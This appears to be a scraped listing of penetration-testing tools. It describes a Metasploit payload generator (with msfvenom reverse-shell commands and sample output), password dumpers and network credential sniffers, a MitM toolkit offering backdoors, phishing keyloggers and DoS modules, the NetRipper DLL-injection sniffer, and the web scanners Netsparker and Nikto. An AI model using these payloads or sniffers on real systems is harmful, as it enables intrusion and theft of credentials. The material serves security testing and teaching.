  • Want to mass create payloads? Everything? Or to filter your selection? Either way, it's not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will not try to bypass any anti-virus solutions.

Install
  • Designed for Kali Linux v1.1.0a+ & Metasploit v4.11+ (nothing else has been tested).
curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/mpc.sh" > /usr/bin/mpc
chmod +x /usr/bin/mpc
mpc

Help
root@kali:~# mpc -h -v
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] /usr/bin/mpc <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
 [i]   Example: /usr/bin/mpc windows 192.168.1.10        # Windows & manual IP.
 [i]            /usr/bin/mpc elf eth0 4444               # Linux, eth0's IP & manual port.
 [i]            /usr/bin/mpc stageless cmd py verbose    # Python, stageless command prompt.
 [i]            /usr/bin/mpc loop eth1                   # A payload for every type, using eth1's IP.
 [i]            /usr/bin/mpc msf batch wan               # All possible Meterpreter payloads, using WAN IP.
 [i]            /usr/bin/mpc help verbose                # This help screen, with even more information.

 [i] <TYPE>:
 [i]   + ASP
 [i]   + ASPX
 [i]   + Bash [.sh]
 [i]   + Java [.jsp]
 [i]   + Linux [.elf]
 [i]   + OSX [.macho]
 [i]   + Perl [.pl]
 [i]   + PHP
 [i]   + Powershell [.ps1]
 [i]   + Python [.py]
 [i]   + Tomcat [.war]
 [i]   + Windows [.exe]

 [i] Rather than putting <DOMAIN/IP>, you can do a interface and MPC will detect that IP address.
 [i] Missing <DOMAIN/IP> will default to the IP menu.

 [i] Missing <PORT> will default to 443.

 [i] <CMD> is a standard/native command prompt/terminal to interactive with.
 [i] <MSF> is a custom cross platform Meterpreter shell, gaining the full power of Metasploit.
 [i] Missing <CMD/MSF> will default to <MSF> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
 [i] <CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
 [i] <MSF> payloads are generally much larger than <CMD>, as it comes with more features.

 [i] <BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
 [i] <REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 [i] Missing <BIND/REVERSE> will default to <REVERSE>.
 [i] <BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

 [i] <STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
 [i] <STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 [i] Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
 [i]   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
 [i] <STAGED> are 'better' in low-bandwidth/high-latency environments.
 [i] <STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
 [i]                   https://www.offensive-security.com/metasploit-unleashed/payloads/

 [i] <TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
 [i] <HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
 [i] <HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
 [i] <FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 [i] Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 [i] By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 [i] More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

 [i] <BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
 [i] <LOOP> will just create one of each <TYPE>.

 [i] <VERBOSE> will display more information.
root@kali:~#

Example #1 (Windows, Fully Automated With IP)
root@kali:~# mpc windows 192.168.1.10
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 > /root/windows-meterpreter-staged-reverse-tcp-443.exe
 [i] File (/root/windows-meterpreter-staged-reverse-tcp-443.exe) already exists. Overwriting...
 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'
 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'   (msfconsole -q -r /root/windows-meterpreter-staged-reverse-tcp-443-exe.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #2 (Linux Format, Fully Automated With Interface and Port)
root@kali:~# ./mpc elf eth0 4444
 [*] Msfvenom Payload Creator (MPC v1.3)
 [i]   IP: 192.168.103.238
 [i] PORT: 4444
 [i] TYPE: linux (linux/x86/shell/reverse_tcp)
 [i]  CMD: msfvenom -p linux/x86/shell/reverse_tcp -f elf --platform linux -a x86 -e generic/none LHOST=192.168.103.238 LPORT=4444 > /root/linux-shell-staged-reverse-tcp-4444.elf
 [i] linux shell created: '/root/linux-shell-staged-reverse-tcp-4444.elf'
 [i] MSF handler file: '/root/linux-shell-staged-reverse-tcp-4444-elf.rc'   (msfconsole -q -r /root/linux-shell-staged-reverse-tcp-4444-elf.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

Example #3 (Python Format, Stageless Command Prompt Using Interactive IP Menu)
root@kali:~# mpc stageless cmd py verbose
 [*] Msfvenom Payload Creator (MPC v1.3)

 [i] Use which interface/IP address?:
 [i]   1.) eth0 - 192.168.103.238
 [i]   2.) eth1 - 192.168.155.175
 [i]   3.) tap0 - 10.10.100.63
 [i]   4.) lo - 127.0.0.1
 [i]   5.) wan - xx.xx.xx.xx
 [?] Select 1-5, interface or IP address: 3

 [i]        IP: 10.10.100.63
 [i]      PORT: 443
 [i]      TYPE: python (python/shell_reverse_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: reverse
 [i]     STAGE: stageless
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p python/shell_reverse_tcp -f raw --platform python -e generic/none -a python LHOST=10.10.100.63 LPORT=443 > /root/python-shell-stageless-reverse-tcp-443.py
 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'
 [i] File: ASCII text, with very long lines, with no line terminators
 [i] Size: 4.0K
 [i]  MD5: 53452eafafe21bff94e6c4621525165b
 [i] SHA1: 18641444f084c5fe7e198c29bf705a68b15c2cc9
 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'   (msfconsole -q -r /root/python-shell-stageless-reverse-tcp-443-py.rc)
 [?] Quick web server for file transfer?   python -m SimpleHTTPServer 8080
 [*] Done!
root@kali:~#

To-Do List
  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp & bind_perl etc)


Download Msfvenom Payload Creator

MySQL Query Browser Password Dump - Command-line Tool to Recover Lost or Forgotten Passwords from MySQL Query Browser


MySQL Query Browser Password Dump is the free command-line tool to instantly recover your lost or forgotten passwords from MySQL Query Browser software.

MySQL Query Browser is a simple piece of software to manage your MySQL database connections and queries. By default, it stores all the database login details so that users don't have to enter them every time.

Our tool helps you to quickly find and decode all the login username & password details for each database. For each recovered MySQL database connection, it displays the following details:
  • Login Username
  • Login Password
  • Database Schema
  • MySQL Port
  • MySQL Host/Server Address

It operates in both automatic and manual mode. You can ask it to auto-detect the password file from the default location of MySQL Query Browser, or manually provide one. This way, you can recover database passwords not only from the local system but also from a file copied from a remote system.

Being a command-line tool makes it an ideal tool for penetration testers and forensic investigators. It is fully portable and also includes an installer to help you with local installation & un-installation.

MySQL Query Browser Password Dump works on both 32-bit & 64-bit platforms, from Windows XP to Windows 8.


Download MySQL Query Browser Password Dump

Net-creds - Sniff passwords and hashes from an interface or pcap file



Thoroughly sniff passwords and hashes from an interface or pcap file. Concatenates fragmented packets and does not rely on ports for service identification.

Sniffs
  • URLs visited
  • POST loads sent
  • HTTP form logins/passwords
  • HTTP basic auth logins/passwords
  • HTTP searches
  • FTP logins/passwords
  • IRC logins/passwords
  • POP logins/passwords
  • IMAP logins/passwords
  • Telnet logins/passwords
  • SMTP logins/passwords
  • SNMP community string
  • NTLMv1/v2 all supported protocols like HTTP, SMB, LDAP, etc
  • Kerberos

Examples

Auto-detect the interface to sniff
sudo python net-creds.py
Choose eth0 as the interface
sudo python net-creds.py -i eth0
Ignore packets to and from 192.168.0.2
sudo python net-creds.py -f 192.168.0.2
Read from pcap
python net-creds.py -p pcapfile


Download Net-creds

netool.sh - MitM Pentesting Opensource T00lkit


The netool.sh toolkit provides a fast and easy way for newcomers to IT security pentesting, and also for experienced users, to use almost all features that a Man-In-The-Middle position can provide on a local LAN: scanning, sniffing and social engineering attacks "[spear phishing attacks]"...

DESCRIPTION
"Scanning - Sniffing - Social Engineering"

Netool: a toolkit written using bash, python and ruby that allows you to automate frameworks like Nmap, Driftnet, Sslstrip, Metasploit and Ettercap MitM attacks. This toolkit makes tasks easy such as sniffing TCP/UDP traffic, Man-In-The-Middle attacks, SSL-sniff, DNS-spoofing, DoS attacks in WAN/LAN networks and TCP/UDP packet manipulation using etter-filters, gives you the ability to capture pictures of the target's web browsing (driftnet), and also uses macchanger to decoy scans by changing the MAC address.

Rootsector: this module allows you to automate some attacks over DNS_SPOOF + MitM (phishing - social engineering) using the metasploit, apache2 and ettercap frameworks, such as the generation of payloads, shellcode and backdoors delivered using dns_spoof and the MitM method to redirect a target to your phishing webpage.

Recently the "inurlbr" webscanner (by cleiton) was introduced, which allows us to search for SQL-related bugs using several search engines; this framework can also be used in conjunction with other frameworks like nmap (using the flag --comand-vul).

Example: inurlbr.php -q 1,2,10 --dork 'inurl:index.php?id=' --exploit-get ?´0x27 -s report.log --comand-vul 'nmap -Pn -p 1-8080 --script http-enum --open _TARGET_'

Operating Systems Supported

Linux-Ubuntu | Linux-kali | Parrot security OS | blackbox OS Linux-backtrack (un-continued) | Mac osx (un-continued).

Dependencies

"TOOLKIT DEPENDENCIES"
zenity | Nmap | Ettercap | Macchanger | Metasploit | Driftnet | Apache2 | sslstrip

"SCANNER INURLBR.php"
curl | libcurl3 | libcurl3-dev | php5 | php5-cli | php5-curl

* Install zenity | Install nmap | Install ettercap | Install macchanger | Install metasploit | Install Apache2 *

Features (modules)
  "1-Show Local Connections"
  "2-Nmap Scanner menu"
        ->
        Ping target
        Show my Ip address
        See/change mac address
        change my PC hostname
        Scan Local network
        Scan external lan for hosts
        Scan a list of targets (list.txt)
        Scan remote host for vulns
        Execute Nmap command
        Search for target geolocation
        ping of death (DoS)
        Norse (cyber attacks map)
        nmap Nse vuln modules
        nmap Nse discovery modules
        retrieve metadata from target website
        retrieve using a fake user-agent
        retrieve only certain file types
        scanner inurlbr.php -> Advanced search with multiple engines; the provided
        analysis enables exploiting GET/POST, capturing emails/urls & internal
        custom validation for each target/url found. Also the ability to use
        external frameworks in conjunction with the scanner like nmap, sqlmap, etc.,
        or simply the use of external scripts.
        package.deb backdoor [Binary linux trojan]
        Backdooring EXE Files [Backdooring EXE Files]
        fakeupdate.exe [dns-spoof phishing backdoor]
        meterpreter powershell invocation payload [by ReL1K]
        host a file attack [dns_spoof+mitm-hosted file]
        clone website [dns-spoof phishing keylogger]
        Java.jar phishing [dns-spoof+java.jar+phishing]
        clone website [dns-spoof + java-applet]
        clone website [browser_autopwn phishing Iframe]
        Block network access [dns-spoof]
        Samsung TV DoS [Plasma TV DoS attack]
        RDP DoS attack [Dos attack against target RDP]
        website D0S flood [Dos attack using syn packets]
        firefox_xpi_bootstrapped_addon automated exploit
        PDF backdoor [insert a payload into a PDF file]
        Winrar backdoor (file spoofing)
        VBScript injection [embed a payload into a Word document]
        ".::[ normal payloads ]::."
        windows.exe payload
        mac osx payload
        linux payload
        java signed applet [multi-operative systems]
        android-meterpreter [android smartphone payload]
        webshell.php [webshell.php backdoor]
        generate shellcode [C,Perl,Ruby,Python,exe,war,vbs,Dll,js]
        Session hijacking [cookie hijacking]
        start a listener [multi-handler]


Screenshots





Download netool.sh

NetRipper - Smart Traffic Sniffing for Penetration Testers


NetRipper is a post-exploitation tool targeting Windows systems which uses API hooking in order to intercept network traffic and encryption-related functions from a low-privileged user, being able to capture both plain-text traffic and encrypted traffic before encryption/after decryption.

NetRipper was released at Defcon 23, Las Vegas, Nevada.

Abstract

The post-exploitation activities in a penetration test can be challenging if the tester has low-privileges on a fully patched, well configured Windows machine. This work presents a technique for helping the tester to find useful information by sniffing network traffic of the applications on the compromised machine, despite his low-privileged rights. Furthermore, the encrypted traffic is also captured before being sent to the encryption layer, thus all traffic (clear-text and encrypted) can be sniffed. The implementation of this technique is a tool called NetRipper which uses API hooking to do the actions mentioned above and which has been especially designed to be used in penetration tests, but the concept can also be used to monitor network traffic of employees or to analyze a malicious application.

Tested applications

NetRipper should be able to capture network traffic from: Putty, WinSCP, SQL Server Management Studio, Lync (Skype for Business), Microsoft Outlook, Google Chrome, Mozilla Firefox. The list is not limited to these applications but other tools may require special support.

Components
NetRipper.exe - Configures and injects the DLL
DLL.dll       - Injected DLL, hooks APIs and saves data to files
netripper.rb  - Metasploit post-exploitation module

Command line
Injection: NetRipper.exe DLLpath.dll processname.exe  
Example:   NetRipper.exe DLL.dll firefox.exe  

Generate DLL:

  -h,  --help          Print this help message  
  -w,  --write         Full path for the DLL to write the configuration data  
  -l,  --location      Full path where to save data files (default TEMP)  

Plugins:

  -p,  --plaintext     Capture only plain-text data. E.g. true  
  -d,  --datalimit     Limit capture size per request. E.g. 4096  
  -s,  --stringfinder  Find specific strings. E.g. user,pass,config  

Example: NetRipper.exe -w DLL.dll -l TEMP -p true -d 4096 -s user,pass  

Metasploit module
msf > use post/windows/gather/netripper 
msf post(netripper) > show options

Module options (post/windows/gather/netripper):

   Name          Current Setting                  Required  Description
   ----          ---------------                  --------  -----------
   DATALIMIT     4096                             no        The number of bytes to save from requests/responses
   DATAPATH      TEMP                             no        Where to save files. E.g. C:\Windows\Temp or TEMP
   PLAINTEXT     true                             no        True to save only plain-text data
   PROCESSIDS                                     no        Process IDs. E.g. 1244,1256
   PROCESSNAMES                                   no        Process names. E.g. firefox.exe,chrome.exe
   SESSION                                        yes       The session to run this module on.
   STRINGFINDER  user,login,pass,database,config  no        Search for specific strings in captured data
Set PROCESSNAMES and run.

Metasploit installation (Kali)
  1. cp netripper.rb /usr/share/metasploit-framework/modules/post/windows/gather/netripper.rb
  2. mkdir /usr/share/metasploit-framework/modules/post/windows/gather/netripper
  3. g++ -Wall netripper.cpp -o netripper
  4. cp netripper /usr/share/metasploit-framework/modules/post/windows/gather/netripper/netripper
  5. cd ../Release
  6. cp DLL.dll /usr/share/metasploit-framework/modules/post/windows/gather/netripper/DLL.dll

PowerShell module

@HarmJ0y Added Invoke-NetRipper.ps1 PowerShell implementation of NetRipper.exe

Plugins
  1. PlainText - Allows capturing only plain-text data
  2. DataLimit - Save only the first bytes of requests and responses
  3. StringFinder - Find specific strings in network traffic

Download NetRipper

Netsparker 4 - Easier to Use, More Automation and Much More Web Security Checks


Netsparker Web Application Security Scanner version 4 has been released. The main highlight of this new version is the new fully automated Form Authentication mechanism: it does not require you to record anything, and supports two-factor authentication and other authentication mechanisms that require a one-time code out of the box.

Below is a list of feature highlights of the new Netsparker Web Application Security Scanner version 4.

Configuring New Web Application Security Scans Just Got Easier

This is the first thing you will notice when you launch the new version of Netsparker Desktop; a more straightforward and easier to use New Scan dialog. Easy to use software has become synonymous with Netsparker’s scanners and in this version we raised the bar again, giving the opportunity to many users to launch web security scans even if they are not that familiar with web application security.



As seen in the above screenshot, all the generic scan settings you need are ergonomically placed, allowing you to quickly configure a new web application security scan. All of the advanced scan settings, such as HTTP connection options, have been moved to scan policies.

Revamped Form Authentication Support to Scan Password Protected Areas

The new fully automated form authentication mechanism of Netsparker Desktop emulates a real user login, so even if tokens or other one-time parameters are used by the web application, an out of the box installation of the scanner can still log in to the password protected area and scan it. In the example below, Netsparker is being used to log in to the MailChimp website.


Once you enter the necessary details, mainly the login form URL and credentials, you can click Verify Login & Logout to verify that the scanner can automatically log in and identify a logged-in session, as shown in the below screenshot.


You do not have to record any login macros because the new mechanism is entirely DOM based. You just have to enter the login form URL, username and password and it will automatically log in to the password protected section. We have tested the new automated form authentication mechanism on more than 300 live websites and can confirm that, using an out of the box setup, it works on 85% of the websites. 13% of the remaining edge cases can be fixed by writing 2-5 lines of JavaScript code with Netsparker’s new JavaScript custom script support. Pretty neat, don’t you think? Below are just a few of the login forms we tested.



The new Form Authentication mechanism also supports custom scripts, which can be used to override the scanner’s behaviour or to handle the rare cases where the automated login button detection does not work. The custom scripting language has been changed to JavaScript because it is easier and many more users are familiar with it.

Out of the Box Support for Two-Factor Authentication and One Time Passwords

The new Form Authentication mechanism of Netsparker Desktop can also be used to automatically scan websites which use two-factor authentication or any other type of one-time password technology. It is very simple to configure: specify the login form URL, username and password and tick the option Interactive Login, so that a browser window automatically prompts you to enter the third authentication factor during a web application security scan.



Ability to Emulate Different User Roles During a Scan

To ensure that all possible vulnerabilities in a password protected area are identified, you should scan it using different users that have different roles and privileges. With the new form authentication mechanism of Netsparker you can do just that! When configuring the authentication details, specify multiple usernames and passwords; between scans you then only have to select which credentials should be used, without needing to record any new login macros or reconfigure the scanner.





Automatically Identify Vulnerabilities in Google Web Toolkit Applications

Google Web Toolkit, also known as GWT, is an open source framework that has gained a lot of popularity. Nowadays many web applications are built on it, or use features and functions from it. Since web applications built with GWT depend heavily on complex JavaScript, we built a dedicated engine in Netsparker to support GWT.

This means that you can use Netsparker Desktop to automatically crawl, scan and identify vulnerabilities and security flaws in Google Web Toolkit applications.



Identify Vulnerabilities in File Upload Forms

As with every version or build of Netsparker we release, we included a number of new security checks in this version. One specific web application security check included in this version deserves more attention than the others: file upload form vulnerabilities.

From this version onwards, Netsparker Desktop will check all the file upload forms on your websites for the vulnerabilities such forms are typically susceptible to; for example, Netsparker tests that all the validation checks in a file upload form work and cannot be bypassed by malicious attackers.



Mixed Content Type, Cross-Frame Options, CORS configuration

We also added various new web security checks, mostly around HTML5 security headers. For example, Netsparker now checks for X-Frame-Options usage and for problems in its implementation which can lead to Clickjacking vulnerabilities and other security issues.

Another new check examines the configuration of CORS headers. Finally, in this category we added Mixed Content Type checks for HTTPS pages and Content-Type header analysis for all pages.

XML External Entity (XXE) Engine

Applications that deal with XML data are particularly susceptible to XML External Entity (XXE) attacks. Successful exploitation of an XXE vulnerability allows an attacker to launch further, more damaging attacks, such as code execution. As of this version, Netsparker automatically checks websites and web applications for XXE vulnerabilities.

Insecure JSONP Endpoints - Rosetta Flash & Reflected File Download Attacks

In this version we added a new security check to identify insecure JSONP endpoints and other controllable endpoints that can lead to Rosetta Flash or Reflected File Download attacks.

Even if your application does not use JSONP, you can still be vulnerable to these types of attack in other forms, which is why it is always important to scan your website with Netsparker.

Other Netsparker Desktop 4 Features and Product Improvements



The above list just highlights the most prominent features and new security checks of Netsparker Desktop version 4, the only false positive free web application security scanner. This version also includes more new security checks, and we improved several existing security checks, so the scanner’s coverage is better than ever before. Of course, we also included a number of product improvements.

Since there have been a good number of improvements and changes in this version, some things from older versions of Netsparker are no longer supported, such as scan profiles. Because we changed the way Netsparker saves scan profiles, scan profiles generated with older versions of Netsparker will no longer work. Therefore I recommend that you check the Netsparker Desktop version 4 changelog for more information on what is new, changed and improved.


Netsparker Cloud - Online Web Application Security Scanner



Netsparker Cloud is an online web application security scanner built around the advanced scanning technology of Netsparker Web Application Security Scanner; the only false positive free automated desktop based web vulnerability scanner.

Benefit from the Cloud

AFFORDABLE AND MAINTENANCE FREE WEB APPLICATION SECURITY SOLUTION

Embrace the benefits of the cloud! With Netsparker Cloud you do not need to buy, license, install or support any hardware or software. Simply pay a yearly fee and launch as many web application security scans as you want, from anywhere, using the web based portal.

SCALABLE AND ALWAYS AVAILABLE: SCAN AS MANY WEBSITES AS YOU WANT WHEN YOU WANT

Netsparker Cloud enables you to launch as many web application security and vulnerability scans as you want within just minutes, thus allowing you to boost your productivity and easily stay a step ahead of malicious attackers.

A new vulnerability such as Heartbleed or Shellshock is being exploited in the wild and you need to scan 500 or 1000 web applications in just a few hours? You have new web applications that you need to add to your extensive scanning program? There is no need to set up any additional hardware and software or call in an emergency team; just log in to the Netsparker Cloud web portal and launch the web security scans.

Other Netsparker Cloud Features Organizations Can Benefit From:
  
FULLY CONFIGURABLE ONLINE WEB VULNERABILITY SCANNER

Netsparker Cloud is fully configurable, just like the desktop version of Netsparker. You can configure every single detail of the web application security scan including scan policies, attack options, HTTP options, URL rewrite rules, authentication options and everything else.

EASILY INTEGRATE WEB SECURITY SCANNING IN YOUR SDLC

Netsparker Cloud has a web service based API that allows you to remotely trigger new web security scans, and much more, from anywhere at any time. Such an API enables organizations to easily integrate web application security scans into their development environment, so they can launch security scans throughout every stage of the software development lifecycle.
    
TEAM AND ENTERPRISE LEVEL COLLABORATION MADE EASY

You can add multiple users with different privileges to the same Netsparker Cloud account, thus allowing everyone in the organization to easily collaborate and share all the findings to streamline the process of securing web applications.

CORRELATED TRENDING REPORTS HELP YOU KEEP TRACK OF WEB APPLICATION PROJECTS

Web applications are constantly evolving; new features, functionality and improvements are the order of the day to ensure they continuously meet all business requirements. However, such changes also open up new security issues.

The Netsparker Cloud security dashboard allows you to easily keep an eye on the security state of all your web applications, while the trending reports help you keep track of the quality of work your developers are doing. Trending reports can also help you monitor who is improving, so you can better assign tasks according to each developer’s skills.


Nikto2 - Web Server Scanner


Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. It also checks for server configuration items such as the presence of multiple index files, HTTP server options, and will attempt to identify installed web servers and software. Scan items and plugins are frequently updated and can be automatically updated.

Nikto is not designed as a stealthy tool. It will test a web server in the quickest time possible, and is obvious in log files or to an IPS/IDS. However, there is support for LibWhisker's anti-IDS methods in case you want to give it a try (or test your IDS system).

Not every check is a security problem, though most are. There are some items that are "info only" type checks that look for things that may not have a security flaw, but the webmaster or security engineer may not know are present on the server. These items are usually marked appropriately in the information printed. There are also some checks for unknown items which have been seen scanned for in log files.

Features

Here are some of the major features of Nikto. See the documentation for a full list of features and how to use them.
  • SSL Support (Unix with OpenSSL or maybe Windows with ActiveState's Perl/NetSSL)
  • Full HTTP proxy support
  • Checks for outdated server components
  • Save reports in plain text, XML, HTML, NBE or CSV
  • Template engine to easily customize reports
  • Scan multiple ports on a server, or multiple servers via input file (including nmap output)
  • LibWhisker's IDS encoding techniques
  • Easily updated via command line
  • Identifies installed software via headers, favicons and files
  • Host authentication with Basic and NTLM
  • Subdomain guessing
  • Apache and cgiwrap username enumeration
  • Mutation techniques to "fish" for content on web servers
  • Scan tuning to include or exclude entire classes of vulnerability checks
  • Guess credentials for authorization realms (including many default id/pw combos)
  • Authorization guessing handles any directory, not just the root directory
  • Enhanced false positive reduction via multiple methods: headers, page content, and content hashing
  • Reports "unusual" headers seen
  • Interactive status, pause and changes to verbosity settings
  • Save full request/response for positive tests
  • Replay saved positive requests
  • Maximum execution time per target
  • Auto-pause at a specified time
  • Checks for common "parking" sites
  • Logging to Metasploit
  • Thorough documentation

Basic usage
   Options:
       -ask+               Whether to ask about submitting updates
                               yes   Ask about each (default)
                               no    Don't ask, don't send
                               auto  Don't ask, just send
       -Cgidirs+           Scan these CGI dirs: "none", "all", or values like "/cgi/ /cgi-a/"
       -config+            Use this config file
       -Display+           Turn on/off display outputs:
                               1     Show redirects
                               2     Show cookies received
                               3     Show all 200/OK responses
                               4     Show URLs which require authentication
                               D     Debug output
                               E     Display all HTTP errors
                               P     Print progress to STDOUT
                               S     Scrub output of IPs and hostnames
                               V     Verbose output
       -dbcheck           Check database and other key files for syntax errors
       -evasion+          Encoding technique:
                               1     Random URI encoding (non-UTF8)
                               2     Directory self-reference (/./)
                               3     Premature URL ending
                               4     Prepend long random string
                               5     Fake parameter
                               6     TAB as request spacer
                               7     Change the case of the URL
                               8     Use Windows directory separator (\)
                               A     Use a carriage return (0x0d) as a request spacer
                               B     Use binary value 0x0b as a request spacer
       -Format+           Save file (-o) format:
                               csv   Comma-separated-value
                               htm   HTML Format
                               msf+  Log to Metasploit
                               nbe   Nessus NBE format
                               txt   Plain text
                               xml   XML Format
                               (if not specified the format will be taken from the file extension passed to -output)
       -Help              Extended help information
       -host+             Target host
       -IgnoreCode        Ignore Codes--treat as negative responses
       -id+               Host authentication to use, format is id:pass or id:pass:realm
       -key+              Client certificate key file
       -list-plugins      List all available plugins, perform no testing
       -maxtime+          Maximum testing time per host
       -mutate+           Guess additional file names:
                               1     Test all files with all root directories
                               2     Guess for password file names
                               3     Enumerate user names via Apache (/~user type requests)
                               4     Enumerate user names via cgiwrap (/cgi-bin/cgiwrap/~user type requests)
                               5     Attempt to brute force sub-domain names, assume that the host name is the parent domain
                               6     Attempt to guess directory names from the supplied dictionary file
       -mutate-options    Provide information for mutates
       -nointeractive     Disables interactive features
       -nolookup          Disables DNS lookups
       -nossl             Disables the use of SSL
       -no404             Disables nikto attempting to guess a 404 page
       -output+           Write output to this file ('.' for auto-name)
       -Pause+            Pause between tests (seconds, integer or float)
       -Plugins+          List of plugins to run (default: ALL)
       -port+             Port to use (default 80)
       -RSAcert+          Client certificate file
       -root+             Prepend root value to all requests, format is /directory
       -Save              Save positive responses to this directory ('.' for auto-name)
       -ssl               Force ssl mode on port
       -Tuning+           Scan tuning:
                               1     Interesting File / Seen in logs
                               2     Misconfiguration / Default File
                               3     Information Disclosure
                               4     Injection (XSS/Script/HTML)
                               5     Remote File Retrieval - Inside Web Root
                               6     Denial of Service
                               7     Remote File Retrieval - Server Wide
                               8     Command Execution / Remote Shell
                               9     SQL Injection
                               0     File Upload
                               a     Authentication Bypass
                               b     Software Identification
                               c     Remote Source Inclusion
                               x     Reverse Tuning Options (i.e., include all except specified)
       -timeout+          Timeout for requests (default 10 seconds)
       -Userdbs           Load only user databases, not the standard databases
                               all   Disable standard dbs and load only user dbs
                               tests Disable only db_tests and load udb_tests
       -until             Run until the specified time or duration
       -update            Update databases and plugins from CIRT.net
       -useproxy          Use the proxy defined in nikto.conf
       -Version           Print plugin and database versions
       -vhost+            Virtual host (for Host header)
              + requires a value

Basic Testing

The most basic Nikto scan requires simply a host to target, since port 80 is assumed if none is specified. The host can either be an IP or a hostname of a machine, and is specified using the -h (-host) option. This will scan the IP 192.168.0.1 on TCP port 80:
perl nikto.pl -h 192.168.0.1
To check on a different port, specify the port number with the -p (-port) option. This will scan the IP 192.168.0.1 on TCP port 443:
perl nikto.pl -h 192.168.0.1 -p 443
Hosts, ports and protocols may also be specified by using a full URL syntax, and it will be scanned:
perl nikto.pl -h https://192.168.0.1:443/
There is no need to specify that port 443 may be SSL, as Nikto will first test regular HTTP and if that fails, HTTPS. If you are sure it is an SSL server, specifying -s (-ssl) will speed up the test.
perl nikto.pl -h 192.168.0.1 -p 443 -ssl
More complex tests can be performed using the -mutate parameter, as detailed later. This can produce extra tests, some of which may be provided with extra parameters through the -mutate-options parameter. For example, using -mutate 3, with or without a file attempts to brute force usernames if the web server allows ~user URIs:
perl nikto.pl -h 192.168.0.1 -mutate 3 -mutate-options user-list.txt

Multiple Port Testing

Nikto can scan multiple ports in the same scanning session. To test more than one port on the same host, specify the list of ports in the -p (-port) option. Ports can be specified as a range (e.g., 80-90) or as a comma-delimited list (e.g., 80,88,90). This will scan the host on ports 80, 88 and 443.
perl nikto.pl -h 192.168.0.1 -p 80,88,443


Download Nikto2

Nipe - Script To Redirect All Traffic From The Machine To The Tor Network

Script to redirect all the traffic from the machine to the Tor network.
    [+] AUTHOR:       Vinicius Gouvea
    [+] EMAIL:        vini@inploit.com
    [+] BLOG:         https://medium.com/viniciusgouvea
    [+] GITHUB:       https://github.com/HeitorG
    [+] FACEBOOK:     https://fb.com/viniciushgouvea


Installing:
git clone https://github.com/HeitorG/nipe
cd nipe
cpan install  strict warnings Switch

Commands:
COMMAND          FUNCTION
install          To install
start            To start
stop             To stop

Tested on:
  • Ubuntu 14.10 and 15.04
  • Busen Labs Hydrogen
  • Debian Jessie 8.1 and Wheezy 7.9
  • Lubuntu 15.04
  • Xubuntu 15.04
  • LionSec 3.0

Download Nipe

Nipper - Toolkit Web Scan for Android


The first web vulnerability scanner tool for the Android environment (an iOS version is in development). This vulnerability scanner was focused on the most widely used CMSs (WordPress, Drupal, Joomla, Blogger).

In its first version, Nipper has 10 different modules for gathering information about a specific URL.

Its interface has been designed so that with just a few “taps” you can extract most of that information.

Available Modules:
  • IP Server
  • CMS Detect & Version
  • DNS Lookup
  • Nmap ports IP SERVER
  • Enumeration Users
  • Enumeration Plugins
  • Find Exploit Core CMS
  • Find Exploit DB
  • CloudFlare Resolver
Nipper does NOT require ROOT; it only requires internet permission.
Compatible from Android 2.3 to Android L.


Download Nipper

